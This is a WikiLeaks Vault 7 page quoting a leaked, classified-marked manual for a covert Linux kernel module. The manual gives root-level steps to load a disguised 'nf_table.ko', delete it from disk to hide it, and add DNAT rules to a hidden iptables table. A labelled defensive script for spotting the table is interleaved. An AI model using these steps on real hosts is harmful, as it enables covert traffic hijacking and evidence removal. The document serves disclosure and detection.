Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//NOFORN
4. (U) Operation
(S//NF) For operational use, shell access is assumed, and root privileges are required.
4.1 (U) Installation
(S//NF) First, select the appropriate kernel module for the target system. For 64-bit
CentOS/RHEL 6.x targets, use the “nf_table_6_64.ko” module. Copy the module to the
target system, preferably with “nf_table.ko” as the file name.
(S//NF) Make sure that the target has a “nat” table:
TARG# iptables -t nat -L -nv
(S//NF) Load the module using “insmod”:
TARG# insmod nf_table.ko
(S//NF) The new “dpxvke8h18” table should now be loaded:
TARG# iptables -t dpxvke8h18 -L -nv
(S//NF) At this point, the module file on disk can safely be removed for operational
security:
TARG# rm nf_table.ko
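A host-side check for the table described in the installation steps above, as an added example that is not part of the original document. Deleting the module file does not unload the module, so the table remains registered in the kernel. The sketch assumes the table is registered through the standard interface and therefore appears in /proc/net/ip_tables_names; the function names are hypothetical and the sample input in the test is constructed.

```shell
#!/bin/sh
# Added example: flag iptables tables that are not part of the stock set.
# Assumption: the kernel lists registered IPv4 tables, one per line, in
# /proc/net/ip_tables_names. Function names here are hypothetical.

STOCK_TABLES="filter nat mangle raw security"

# Print every table name in the given file that is not a stock iptables table.
# Returns 2 if the file cannot be read.
unexpected_tables() {
    names_file="${1:-/proc/net/ip_tables_names}"
    [ -r "$names_file" ] || return 2
    while IFS= read -r name || [ -n "$name" ]; do
        [ -n "$name" ] || continue
        case " $STOCK_TABLES " in
            *" $name "*) ;;                  # known table, ignore
            *) printf '%s\n' "$name" ;;      # anything else is reported
        esac
    done < "$names_file"
}

# Return 0 if the table name given in this document is present.
has_documented_table() {
    names_file="${1:-/proc/net/ip_tables_names}"
    grep -Fqx 'dpxvke8h18' "$names_file" 2>/dev/null
}

# Return 0 when only stock tables exist, 1 when an unexpected table is found,
# 2 when the list of tables could not be read.
audit_tables() {
    found=$(unexpected_tables "$1") || return 2
    [ -z "$found" ] && return 0
    # Table names contain no whitespace, so word splitting gives one per line.
    printf 'unexpected netfilter table: %s\n' $found >&2
    return 1
}
```

Call `audit_tables` with no argument on a live host to read /proc/net/ip_tables_names directly. Matching on anything outside the stock set also catches a renamed table, which a check for the literal name alone would miss.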
4.2 (U) Use
(S//NF) The “dpxvke8h18” table has a PREROUTING chain that supports DNAT
(Destination Network Address Translation) rules, which can be added with the “-A” or
“-I” options available in the “iptables” command:
TARG# iptables -t dpxvke8h18 -A PREROUTING \
-p tcp -s 1.1.1.1 -d 2.2.2.2 --dport 33 \
-j DNAT --to-destination 4.4.4.4:55
(S//NF) The example above applies to TCP traffic from IP 1.1.1.1 that is bound for IP
2.2.2.2, port 33. The traffic is redirected to IP 4.4.4.4, port 55. For more information
about iptables and DNAT rules, consult the iptables man pages.
(S//NF) Current rules can be listed using the “iptables -L” command: